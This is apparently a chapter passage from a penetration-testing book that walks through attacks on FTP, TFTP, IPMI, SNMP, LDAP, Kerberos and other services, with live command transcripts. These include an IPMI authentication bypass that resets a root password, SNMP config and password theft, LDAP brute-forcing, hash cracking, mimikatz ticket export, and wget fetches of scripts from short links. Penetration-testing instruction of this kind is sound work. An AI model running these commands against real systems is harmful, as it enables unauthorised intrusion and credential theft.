FTP

File Transfer Protocol (FTP) provides remote file system access, usually for maintenance of web applications. Servers use two ports to function: TCP port 21, the inbound server control port which processes FTP commands from the client, and TCP port 20, the outbound data port used to transmit data to the client. File transfers are orchestrated over the control port (21), where commands including PORT are used to initiate a data transfer over the outbound data port.

FTP services are vulnerable to the following classes of attack:

• Brute-force password grinding

• Anonymous browsing and exploitation of software defects

• Authenticated exploitation of vulnerabilities (requiring certain privileges)

root@kali:~# nmap -Pn -sS -A -p21 130.59.10.36

Starting Nmap 6.46 (http://nmap.org) at 2014-11-02 08:13 UTC
Nmap scan report for 130.59.10.36
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| lrwxrwxrwx    1 ftp      ftp             8 Jun 26  2013 README -> .message
| drwxr-xr-x    3 ftp      ftp             4 May 24  2013 doc
| -rw-rw-r--    1 ftp      ftp      80531673 Nov 02 05:59 ls-lR.gz
| drwxr-xr-x    2 ftp      ftp            75 May 16 13:30 mirror
| drwxr-xr-x    4 ftp      ftp             4 Jul 24 07:18 pool
| drwxrwxr-x    3 ftp      ftp             7 Jan 31  2013 pub
| drwxrwxr-x   10 ftp      ftp            11 Mar 21  2004 software
| lrwxrwxrwx    1 ftp      ftp            13 Jun 26  2013 ubuntu 
|_lrwxrwxrwx    1 ftp      ftp            21 Jun 26  2013 ubuntu-cdimage
Device type: general purpose
Running: Linux 2.4.X

root@kali:~# searchsploit iis ftp
---------------------------------------------------- ---------------------------
Description                                         |  Path
---------------------------------------------------- ---------------------------
Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overf | /windows/remote/9541.pl
Microsoft IIS 5.0 FTP Server Remote Stack Overflow  | /windows/remote/9559.pl
Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) | /windows/dos/9587.txt
Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC     | /windows/dos/15803.py
Microsoft IIS FTP Server NLST Response Overflow     | /windows/remote/16740.rb
Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion  | /windows/dos/17476.rb
Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnera | /windows/dos/20846.pl
---------------------------------------------------- ---------------------------

TFTP

TFTP uses UDP port 69 and requires no authentication—clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.

TFTP servers are exploited via the following attack classes:

• Obtaining material from the server (e.g., configuration files containing secrets)

• Bypassing controls to overwrite data on the server (e.g., replacing a ROM image)

• Executing code via an overflow or memory corruption flaw

The tftp utility within Kali Linux is used to manually connect to TFTP servers and issue read (get) and write (put) requests. The protocol provides no means of listing directory contents, and so precise filenames must be known.

Nmap’s tftp-enum script issues read requests by using a dictionary of common filenames, which often reveals useful content. Metasploit contains a similar brute-force module.² Example 7-3 demonstrates Nmap run against an available server, and the tftp client used to retrieve a file (sip.cfg in this case). 

root@kali:~# nmap -Pn -sU -p69 --script tftp-enum 192.168.10.250

Starting Nmap 6.46 (http://nmap.org) at 2014-11-14 13:01 UTC
Nmap scan report for 192.168.10.250
PORT   STATE SERVICE
69/udp open  tftp
| tftp-enum:
| tftp-enum:
|   sip.cfg
|   syncinfo.xml
|   SEPDefault.cnf
|   SIPDefault.cnf
|_  XMLDefault.cnf.xml

root@kali:~# tftp 192.168.10.250
tftp> get sip.cfg
Received 1738 bytes in 0.6 seconds
tftp> quit
root@kali:~# head -5 sip.cfg
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!-- Generated sip-basic.cfg Configuration File -->
<polycomConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="polycomConfig.xsd">
  <msg>
    <msg.mwi msg.mwi.1.callBackMode="registration" 
    msg.mwi.2.callBackMode="registration"></msg.mwi>

Many TFTP server configurations also permit arbitrary file uploads, as shown here:

root@kali:~# echo testing > test.txt
root@kali:~# tftp 192.168.10.250
tftp> put test.txt
Sent 9 bytes in 0.3 seconds
tftp> get test.txt
Received 9 bytes in 0.1 seconds

Telnet

Telnet provides command-line access to servers and embedded devices. The protocol has no transport security, and sessions can be passively sniffed or actively hijacked by adversaries with network access.

Exposed services are vulnerable to the following classes of remote attack:

• Brute-force password grinding, revealing weak or default credentials

• Anonymous exploitation of Telnet server software flaws (without credentials)

Nmap attempts to fingerprint Telnet services, as shown in Example 7-10. In this case, the version of HP-UX (B.10.20) is not returned, but revealed upon connecting manually by using telnet.

root@kali:~# nmap -sSV -p23 211.35.138.48

Starting Nmap 6.46 (http://nmap.org) at 2014-11-14 09:40 UTC
Nmap scan report for 211.35.138.48
PORT   STATE SERVICE VERSION
23/tcp open  telnet  HP-UX telnetd
Service Info: OS: HP-UX; CPE: cpe:/o:hp:hp-ux

root@kali:~# telnet 211.35.138.48
Trying 211.35.138.48...
Connected to 211.35.138.48.
Escape character is '^]'.

HP-UX seal B.10.20 C 9000/847 (ttyp2)

login:

IPMI

Baseboard management controllers (BMCs) are embedded computers that provide out-of-band monitoring for desktops and servers. BMC products are sold under many brand names, including HP iLO, Dell DRAC, and Sun ILOM. These devices often expose an IPMI service via UDP port 623.

Network sweeping with a single-packet probe is a quick way of identifying IPMI interfaces, as demonstrated by Example 7-11 (using the Metasploit ipmi_version module).

msf > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.22:623 - IPMI - IPMI-2.0 UserAuth(auth_user,non_null_user) PassAuth(md5,md2) 
                           Level(1.5,2.0)

Two remotely exploitable IPMI flaws are as follows:

• Remote password hash retrieval via RAKP¹⁷

• Zero cipher authentication bypass resulting in administrative access¹⁸

Examples 7-12 and 7-13 demonstrate exploitation of these flaws using Metasploit. You can crack the user password hash with Hashcat¹⁹ or John the Ripper.²⁰

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.0.22
msf auxiliary(ipmi_dumphashes) > run
[+] 10.0.0.22:623 - IPMI - Hash found: root:58a929ac021b0002fe2c887ec3f67d5ec173374859df715a59db
ba5e4922219e838223086447e3b144454c4c4c00105a8036b2c04f5a52311404726f6f74:4b0e4b47db800e71c503eb0
226bae7ca5466e7e9

msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 10.0.0.22
msf auxiliary(ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.0.0.22->10.0.0.22 (1 hosts)
[+] 10.0.0.22:623 - IPMI - VULNERABLE: Accepted a session open request

The Linux ipmitool client is used to interact with the service and bypass authentication (via the -C 0 option). Example 7-14 demonstrates installation and use within Kali Linux to set the root user account password to abc123 via IPMI.

root@kali:~# apt-get install ipmitool
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ID  Name      Callin  Link Auth   IPMI Msg   Channel Priv Limit
2   root             true    true       true       ADMINISTRATOR
3   Oper1            true    true       true       ADMINISTRATOR
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
root@kali:~# ssh root@10.0.0.22
root@10.121.1.22's password: abc123
/admin1-> version
SM CLP Version: 1.0.2
SM ME Addressing Version: 1.0.0b
/admin1-> help
[Usage]
    show   [<options>] [<target>] [<properties>]
           [<propertyname>== <propertyvalue>]
    set    [<options>] [<target>] <propertyname>=<value>
    cd     [<options>] [<target>]
    create [<options>] <target> [<property of new target>=<value>]
           [<property of new target>=<value>]
    delete [<options>] <target>
    exit   [<options>]
    reset  [<options>] [<target>]
    start  [<options>] [<target>]
    stop   [<options>] [<target>]
    version [<options>]
    help   [<options>] [<help topics>]
    load -source <URI> [<options>] [<target>]
    dump -destination <URI> [<options>] [<target>]

DNS

Chapter 4 describes the tactics used to enumerate and map networks via DNS. Name servers use two ports to fulfill requests: UDP port 53 to serve regular requests (i.e., resolve names to IP addresses, and vice versa), and TCP port 53 to reliably send high volumes of data, such as DNS zone files.

DNS services are vulnerable to the following classes of attack:

• Denial of service, limiting name service availability

• Memory corruption and code execution via server software defects

• Cache poisoning and corruption, undermining integrity of name service

To investigate the configuration, first fingerprint the service, and then enumerate support for recursion and other features, as detailed in the following sections.

root@kali:~# nmap -Pn -sU -A -p53 ns2.isc-sns.com

Starting Nmap 6.46 (http://nmap.org) at 2014-11-07 17:46 UTC
Nmap scan report for ns2.isc-sns.com (38.103.2.1)
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND 9.9.3-S1-P1
| dns-nsid:
|_  bind.version: 9.9.3-S1-P1

root@kali:~# nmap -Pn -sU -A -p53 ns.rackspace.com

Starting Nmap 6.46 (http://nmap.org) at 2014-11-07 18:10 UTC
Nmap scan report for ns.rackspace.com (69.20.95.4)
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND hostmaster
| dns-nsid:
|   NSID: a4.iad3 (61342e69616433)
|_  id.server: a4.iad3

root@kali:~# nmap -Pn -sU -A -p53 ns2.rackspace.com

Starting Nmap 6.46 (http://nmap.org) at 2014-11-07 18:13 UTC
Nmap scan report for ns2.rackspace.com (65.61.188.4)
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND hostmaster
| dns-nsid:
|   NSID: a4.lon3 (61342e6c6f6e33)
|_  id.server: a4.lon3

root@kali:~# dig +short version.bind chaos txt @ns2.isc-sns.com
"9.9.3-S1-P1"
root@kali:~# dig +short +nsid CH TXT id.server @ns2.rackspace.com
"a1.lon3"

root@kali:~# nmap -sSUV -p53 --script dns-recursion,dns-random-srcport,dns-random-txid \
192.168.208.2

Starting Nmap 6.46 (http://nmap.org) at 2014-12-16 14:17 UTC
Nmap scan report for 192.168.208.2
PORT   STATE  SERVICE VERSION
53/udp open   domain  Microsoft DNS
|_dns-random-srcport: GREAT: 7 queries in 0.6 seconds from 7 ports with std dev 10785
|_dns-random-txid: GREAT: 11 queries in 24.6 seconds from 11 txids with std dev 17480
|_dns-recursion: Recursion appears to be enabled

NTP

NTP services are often found running on UDP port 123 of network devices and Unix-based systems. You can use the ntp-info and ntp-monlist scripts within Nmap to query accessible services, as shown in Example 7-19. Responses often reveal the server software version, operating system details, and NTP configuration, including IP addresses of public and nonpublic peers.

root@kali:~# nmap -sU -p123 --script ntp-* 125.142.170.129

Starting Nmap 6.46 (http://nmap.org) at 2014-11-14 09:20 UTC
Nmap scan report for 125.142.170.129
PORT    STATE SERVICE
123/udp open  ntp
| ntp-info:
|   receive time stamp: 2014-11-14T20:02:46
|   version: ntpd 4.2.6p2@1.2194 Tue Nov 26 07:56:40 UTC 2013 (1)
|   processor: mips
|   system: Linux/2.6.32
|   leap: 0
|   stratum: 3
|   precision: -14
|   rootdelay: 12.952
|   rootdisp: 35.490
|   refid: 220.73.142.70
|   reftime: 0xd810db0a.29b70fc0
|   clock: 0xd810de66.6f95a453
|   peer: 5552
|   tc: 10
|   mintc: 3
|   offset: -1.031
|   frequency: -5.120
|   sys_jitter: 0.940
|   clk_jitter: 0.971
|_  clk_wander: 0.123
| ntp-monlist:
|   Target is synchronised with 220.73.142.70
|   Public Peers (1)
|       221.39.227.251
|   Public Clients (1)
|_      162.216.3.10

Along with these information leak issues, known defects within NTP server packages are listed in Table 7-14. You can find recent security bulletins and vulnerability details online through the NTP support portal.²⁵

SNMP

Simple Network Management Protocol (SNMP) services are often run on managed switches, routers, and server operating systems (e.g., Microsoft Windows Server and Linux) for monitoring purposes. SNMP is accessed upon providing a valid community string within a UDP datagram to port 161. Most servers are configured with two community strings: one providing read-only access to the SNMP Management Information Base (MIB), and the other both read and write access.

The MIB is a hierarchy of Object Identifier (OID) values, as demonstrated by Example 7-20. In this case, we connect using SNMP version 1 and a community string of public to access 192.168.0.42.

root@kali:~# snmpwalk -v 1 -c public 192.168.0.42
.1.3.6.1.2.1.1.1.0 = STRING: "Cisco Internetwork Operating System Software IOS (tm) C837 
Software (C837-K9O3Y6-M), Version 12.3(2)XC2, EARLY DEPLOYMENT RELEASE SOFTWARE (fc1)
Synched to technology version 12.3(1.6)T
Technical Support: http://www.cisco.com/techsupport
Copyright (c"
iso.3.6.1.2.1.1.2.0 = OID: .1.3.6.1.4.1.9.1.495
iso.6.1.2.1.1.3.0 = Timeticks: (749383984) 86 days, 17:37:19.84
iso.3.6.1.2.1.1.4.0 = "admin@localhost"
iso.3.6.1.2.1.1.5.0 = STRING: "pipex-gw.trustmatta.com"
iso.3.6.1.2.1.1.6.0 = "4th floor"

The SNMP utilities within Kali Linux do not resolve OID entries to human-readable values. To enable this support, use the following commands to download MIB data and override directives within /etc/snmp/snmp.conf:

apt-get install snmp-mibs-downloader
download-mibs
echo "" > /etc/snmp/snmp.conf

The snmpwalk utility will then provide descriptions for each value, as shown:

SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS (tm) C837 
Software (C837-K9O3Y6-M), Version 12.3(2)XC2, EARLY DEPLOYMENT RELEASE SOFTWARE (fc1)
Synched to technology version 12.3(1.6)T
Technical Support: http://www.cisco.com/techsupport
Copyright (c
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.495
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (749894097) 86 days, 17:39:01.14
SNMPv2-MIB::sysContact.0 = STRING: admin@localhost
SNMPv2-MIB::sysName.0 = STRING: pipex-gw.trustmatta.com
SNMPv2-MIB::sysLocation.0 = STRING: 4th floor

Servers may support SNMP protocol version 1, 2, or 3, as described in Table 7-15. When using snmpwalk, use the -v flag to specify the protocol. SNMPv3 servers can also run over TCP port 161 and use TLS to provide transport security.

apt-get install snmp-mibs-downloader
download-mibs
wget http://bit.ly/2ccg7cj
wget http://bit.ly/2cch18I
chmod 755 snmpv3enum.rb

root@kali:~# ./snmpv3enum.rb -i 10.0.0.5 -u usernames
valid username : snmpAdmin on host : 10.0.0.5

root@kali:~# hydra -U snmp
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-12-16 12:08:39

Help for module snmp:
============================================================================
Module snmp is optionally taking the following parameters:
   READ  perform read requests (default)
   WRITE perform write requests
   1     use SNMP version 1 (default)
   2     use SNMP version 2
   3     use SNMP version 3
           Note that SNMP version 3 usually uses both login and passwords!
           SNMP version 3 has the following optional sub parameters:
             MD5   use MD5 authentication (default)
             SHA   use SHA authentication
             DES   use DES encryption
             AES   use AES encryption
           if no -p/-P parameter is given, SNMPv3 noauth is performed, which
           only requires a password (or username) not both.
To combine the options, use colons (":"), e.g.:
   hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ target.com snmp
   hydra -P pass.txt -m 2 target.com snmp

root@kali:~# snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25
enterprises.77.1.2.25.1.1.101.115.115 = "Chris"
enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IUSR_CARTMAN"
enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IWAM_CARTMAN"
enterprises.77.1.2.25.1.1.114.97.116.111.114 = "Administrator"
enterprises.77.1.2.25.1.1.116.85.115.101.114 = "TsInternetUser"
enterprises.77.1.2.25.1.1.118.105.99.101.115 = "NetShowServices"

.1.3.6.1.2.1.1.5

.1.3.6.1.4.1.77.1.4.2

.1.3.6.1.4.1.77.1.2.25

.1.3.6.1.4.1.77.1.2.3.1.1

.1.3.6.1.4.1.77.1.2.27

root@kali:~# snmpwalk -v 1 -c public 60.56.160.15
RFC1213-MIB::atNetAddress.3.1.10.178.64.1 = Network Address: 0A:B2:40:01
RFC1213-MIB::atNetAddress.3.1.10.178.64.9 = Network Address: 0A:B2:40:09
RFC1213-MIB::atNetAddress.3.1.10.178.64.31 = Network Address: 0A:B2:40:1F
RFC1213-MIB::atNetAddress.3.1.10.178.64.59 = Network Address: 0A:B2:40:3B
RFC1213-MIB::atNetAddress.3.1.10.178.65.192 = Network Address: 0A:B2:41:C0
RFC1213-MIB::atNetAddress.3.1.10.178.93.215 = Network Address: 0A:B2:5D:D7

msf > use auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(cisco_config_tftp)> set LHOST 192.168.102.200
msf auxiliary(cisco_config_tftp)> set OUTPUTDIR /tmp/
msf auxiliary(cisco_config_tftp)> set RHOSTS 192.168.102.250
msf auxiliary(cisco_config_tftp)> set COMMUNITY private
msf auxiliary(cisco_config_tftp)> run
[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 192.168.102.250...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 192.168.102.250 – 192.168.102.250.txt 1151 bytes
[+] 192.168.102.250:161 SNMP Community (RW): private
[*] Collecting: private
[+] 192.168.102.250:161 Unencrypted VTY Password: control

LDAP

Lightweight Directory Access Protocol (LDAP) services are commonly found running on Microsoft Active Directory, Exchange, and IBM Domino servers. Within Active Directory, the LDAP service is known as the Global Catalog. Table 7-18 lists individual ports supporting LDAP services. The current protocol used by many implementations is LDAP 3.0.

LDAP is an open protocol providing directory information services over IP. Directory services provide information about users, systems, networks, services, and applications throughout a network.

Exposed LDAP servers are vulnerable to the following classes of remote attack:

• Information leak via anonymous binding

• Brute-force password grinding

• Authenticated modification of data within the LDAP directory

• Exploitation of LDAP server software defects (with or without credentials)

I discuss these tactics within the subsequent sections. Before that, let’s go over the LDAP protocol³² and its features with regard to authentication, operations, and directory structure.

LDAP Authentication

Clients use one of two authentication methods³³ when connecting to a server:

Simple

Simple authentication sends plaintext credentials in an LDAP bind request. If an anonymous bind operation is being undertaken, no credentials are provided.

SASL

The Simple Authentication and Security Layer (SASL)³⁴ provides support for authentication mechanisms including DIGEST-MD5 and CRAM-MD5.

Figure 7-2 demonstrates the way in which SASL acts as an abstraction layer between exposed services (e.g., SMTP and XMPP) and authentication providers.

Figure 7-2. Simple Authentication and Security Layer (SASL)

Table 7-19 lists common authentication mechanisms presented via SASL.

Table 7-19. SASL authentication mechanisms

Mechanism	Notes
CRAM-MD5	An MD5 challenge-response authentication mechanism.a This method is susceptible to known plaintext attack by which tools, including Cain & Abel, can crack passwords upon sniffing challenge–response data
DIGEST-MD5	Digest MD5 authentication, in which a server sends a challenge and nonce value, which is then hashed by a client using a key derived from a combination of username, password, and realmb
GSSAPI	Kerberos authentication via the GSSAPIc
GSS-SPNEGO	Microsoft negotiate authentication via the GSSAPI
NTLM	Microsoft NTLM authenticationd
OTP	One-time passworde
PLAIN	Plaintext authentication with base64 encoding
a See RFC 2195. b See RFC 2617. c See RFC 4752. d See “4.1 SMTP Client Successfully Authenticating to an SMTP Server” on the Microsoft Developer Network. e See RFC 2444.

LDAP Operations

Table 7-20 lists individual operations used to authenticate with an LDAP server and then retrieve, add, or modify directory data.

Table 7-20. LDAP operations

Operation	Description
BIND	Authenticate with LDAP
SEARCH	Search the directory
COMPARE	Test if an entry contains a given attribute value
ADD	Add a new entry
DELETE	Delete an entry
MODIFY	Modify an entry
MODIFY DN	Move or rename a DN
ABANDON	Abort the previous request
EXTENDED	Extended operation
UNBIND	Close the connection

Most operations work upon authenticating. Figure 7-3 demonstrates the network transport, TLS, SASL, and LDAP message layers. You can run TLS either over an existing LDAP channel (i.e., TCP port 389) via the STARTTLS command, or through a dedicated LDAPS port (such as TCP port 636).

Figure 7-3. LDAP layers when using TLS

Note

The OpenLDAP utilities package (openldap-utils) includes clients that perform the operations listed in Table 7-20, along with extended operations (e.g., LDAP user password changing).

LDAP Directory Structure

Directories consist of X.500 attributes.³⁵ Within LDAP hierarchy, four attributes define the parent domain, organization, organizational units (OUs), and objects (e.g., users or individual systems), as listed in Table 7-21 and shown in Figure 7-4.

Table 7-21. X.500 attributes used within LDAP

Attribute	Description	Example
DC	Domain component	dc=example,dc=com
O	Organization	o=Example LLC
OU	Organizational unit name	ou=Marketing
CN	Common name	cn=John Smith

Within LDAP, a Distinguished Name (DN) is a full path to an object. Here are a couple of examples of LDAP DNs within Figure 7-4:

cn=John West,ou=Engineering,dc=example,dc=com
cn=Sally Stevens,ou=Sales,dc=example,dc=com

Figure 7-4. An LDAP directory structure

Other attributes (e.g., telephoneNumber and roomNumber) can define values relating to individual objects. You can define user password hashes, command shells, UID values, and other variables in this manner. Structures and attributes found within Microsoft Active Directory often include the following:

• Domains, users, and groups, and OUs

• Group policy objects (attached to OUs to enforce particular policies)

• Systems (i.e., workstations, servers, and network devices)

• Server applications and functions

• Sites and networks (used for mail routing within Microsoft Exchange)

root@kali:~# nmap -Pn -sV -p389 --script ldap-rootdse,ldap-search 50.116.56.5

Starting Nmap 6.46 (http://nmap.org) at 2014-12-15 02:08 UTC
Nmap scan report for oscar.orcharddrivellc.com (50.116.56.5)
PORT    STATE SERVICE VERSION
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       namingContexts: dc=orcharddrivellc,dc=com
|       supportedControl: 2.16.840.1.113730.3.4.18
|       supportedControl: 2.16.840.1.113730.3.4.2
|       supportedControl: 1.3.6.1.4.1.4203.1.10.1
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.826.0.1.3344810.2.3
|       supportedControl: 1.3.6.1.1.13.2
|       supportedControl: 1.3.6.1.1.13.1
|       supportedControl: 1.3.6.1.1.12
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|       supportedExtension: 1.3.6.1.1.8
|       supportedLDAPVersion: 3
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: CRAM-MD5
|       supportedSASLMechanisms: NTLM
|_      subschemaSubentry: cn=Subschema
| ldap-search:
|   Context: dc=orcharddrivellc,dc=com
|     dn: dc=orcharddrivellc,dc=com
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: orcharddrivellc.com
|         dc: orcharddrivellc
|     dn: cn=admin,dc=orcharddrivellc,dc=com
|         objectClass: simpleSecurityObject
|         objectClass: organizationalRole
|         cn: admin
|_        description: LDAP administrator

2.16.840.1.113730.3.4.18

2.16.840.1.113730.3.4.2

1.3.6.1.4.1.4203.1.10.1

1.2.840.113556.1.4.319

1.2.826.0.1.3344810.2.3

1.3.6.1.1.13.2

1.3.6.1.1.13.1

1.3.6.1.1.12

1.3.6.1.4.1.4203.1.11.1

1.3.6.1.4.1.4203.1.11.3

1.3.6.1.1.8

C:\tools\ebrute> ebrute.exe -r ldap -u da_craigb -h 172.16.102.12 -e research -t 10 -P pass.txt
ebrute v0.78 - Edward Torkington
Checking for alive hosts. Max retries = 3, connect timeout = 500ms.
Loading passes...
Parsing passes...
Added:    1 user(s), 26 password(s), 1 host(s), 26 tasks over 10 thread/s.
Starting: 10/10/2015 4:58:09 AM
[5]  HOST: '172.16.102.12' | USER: 'da_craigb' | PASS: 'Trustno1' |
     EXTRA: 'research' | Return code: 'Success' []

root@kali:~# ldapsearch -D "cn=admin" -w secret123 -p 389 -h 50.116.56.5 \
-s base -b "ou=people,dc=orcharddrivellc,dc=com" "objectclass=*"
version:1
dn: uid=jsmith, ou=People, dc=orcharddrivellc,dc=com
givenName: Jonas
sn: Smith
ou: People
mail: jsmith@orcharddrivellc.com
objectClass: top
objectClass: person
uid: jsmith
cn: Jonas Smith
userPassword: {SSHA}Z3KxHzHGo1TdQwBq3L76lmnM3n6kcd6T

root@kali:~# echo "jsmith:{SSHA}Z3KxHzHGo1TdQwBq3L76lmnM3n6kcd6T" > hash.txt
root@kali:~# wget http://bit.ly/2b5K8Hi
root@kali:~# unzip wordlists.zip
root@kali:~# john hash.txt -wordlist=common.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Salted-SHA1 [SHA1 32/32])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (jsmith)

Kerberos

Kerberos⁴² is the authentication protocol used within Microsoft Windows networks and Unix-based environments. A benefit of the protocol is that user passwords are not used to authenticate with individual services; rather, it uses encrypted tickets generated by a Key Distribution Center (KDC).

The KDC offers authentication and ticket-granting services, as demonstrated by Figure 7-5. These mechanisms serve two ticket types to clients: ticket-granting and individual service tickets. Within Microsoft networks, a ticket-granting ticket (TGT) is provided by the KDC upon logon to a domain. Within Unix-based environments, kinit is invoked. The TGT is used to request service tickets, which, in turn, are used to access individual applications. The messages shown in Figure 7-5 are described in Table 7-24.

Figure 7-5. Kerberos KDC authentication and ticketing

KRB_AS_REQ

KRB_AS_REP

KRB_TGS_REQ

KRB_TGS_REP

KRB_AP_REQ

KRB_AP_REP

KRB_ERROR

KRB_SAFE

KRB_PRIV

KRB_CRED

The protocol is stateless, and tickets describe user privileges. As such, if the master key used by a KDC is compromised, an attacker can create arbitrary tickets known as golden tickets.⁴³ If principal passwords, keys, or tickets are compromised, an attacker can also use them to generate tickets and access services. Alva Duckwall and Benjamin Delpy’s Black Hat USA 2014 presentation⁴⁴ detail these scenarios, and Fulvio Ricciardi’s description of the Kerberos protocol is an excellent resource.⁴⁵

Ticket Format

Kerberos tickets are ASN.1 encoded and contain a ticket block encrypted using the long-term key of the authentication service (i.e., the KDC master key) or an individual service principal (such as a network service or application). Microsoft’s implementation includes a privilege attribute certificate (PAC) data structure, which is signed and includes username, domain, user, and group details.

Figure 7-6 summarizes the Microsoft Kerberos ticket structure, which is then encrypted by the KDC using either the authentication service key (in the case of a TGT) or a particular service principal key (in the case of a service ticket).

Figure 7-6. Microsoft Kerberos ticket format

Table 7-25 lists individual Kerberos ticket fields. The first three fields are plaintext (so that the client can cache and manage the ticket), and the remaining ticket block is encrypted.

Table 7-25. Kerberos ticket fields

Field	Description
Version number	Kerberos version used by the ticket format
Realm	Name of the realm (domain) that issued the ticket
Server name	The target service principal name and realm
Flags	Options for the ticket (forwardable, renewable, invalid, etc.)
Key	The session key used to encrypt subsequent messages
Client realm	The realm of the requester
Client name	The principal name of the requester
Transited	A list of Kerberos realms if cross-realm authentication is used
Authentication time	The timestamp of the initial authentication event
Start time	The time from which the ticket is valid
End time	The expiry time for the ticket
Renew until	The optional time until which the ticket can be renewed
Client address	Optional list of addresses from which the ticket can be used
Authorization data	Authorization data for the client—in the Microsoft implementation, this contains the PAC data structure defining the username, domain, and SID values; within MIT Kerberos, this field usually contains restrictions that should be enforced

Microsoft PAC fields

The PAC is found within the authorization data in the encrypted ticket. Useful fields within the PAC are found under the KERB_VALIDATION_INFO structure, including the username, domain, and group membership details. Microsoft’s specification document describes the fields.⁴⁷

Ticket block encryption and signing

TGTs are encrypted by using the user principal long-term key to prevent eavesdropping. Upon decrypting the TGT, the session key is obtained and the encrypted ticket block is cached. Service tickets are then encrypted by using the session key and contain an encrypted ticket block. Within Microsoft implementations, the ticket block and PAC data structure are encrypted and signed, as described in Table 7-26.

Table 7-26. Microsoft Kerberos ticket block encryption and signing

	Ticket block encryption	PAC signature (KDC)	PAC signature (server)
Ticket-granting ticket (TGT)	krbtgt	krbtgt	krbtgt
Service ticket	target	krbtgt	target

Within TGTs, Microsoft KDC servers sign the PAC data structure (using RC4-HMAC or HMAC-SHA1-96 with a 128- or 256-bit key, depending on configuration) to prevent tampering. Because the target server must validate the PAC within service tickets, the KDC signs the PAC twice, first using the long-term key of the authentication service, and then using the long-term key of the target server.

Upon compromising the long-term key of the KDC authentication service (krbtgt) you can generate arbitrary TGTs (golden tickets). Armed with the long-term key of a service principal (target), you can modify service tickets to produce silver tickets⁴⁸ containing forged PAC structures.

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct  9 2015 00:33:13)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 16 modules * * */

mimikatz # kerberos::

Module :        kerberos
Full name :     Kerberos package module
Description :

             ptt  -  Pass-the-ticket [NT 6]
            list  -  List ticket(s)
             tgt  -  Retrieve current TGT
           purge  -  Purge ticket(s)
          golden  -  Willy Wonka factory
            hash  -  Hash password to keys
             ptc  -  Pass-the-ccache [NT6]
           clist  -  List tickets in MIT/Heimdall ccache

mimikatz # kerberos::list /export

[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ;
                    11/2/2015 11:39:31 PM
Server Name       : krbtgt/ABC.ORG @ ABC.ORG
Client Name       : uberuser @ ABC.ORG
Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
* Saved to file   : 0-60a10000-uberuser@krbtgt~ABC.ORG-ABC.ORG.kirbi

[00000001] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ;
                    11/2/2015 11:39:31 PM
Server Name       : krbtgt/ABC.ORG @ ABC.ORG
Client Name       : uberuser @ ABC.ORG
Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ;  forwardable ;
* Saved to file   : 1-40e10000-uberuser@krbtgt~ABC.ORG-ABC.ORG.kirbi

[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/201
5 11:39:31 PM
Server Name       : cifs/dc1.abc.org @ ABC.ORG
Client Name       : uberuser @ ABC.ORG
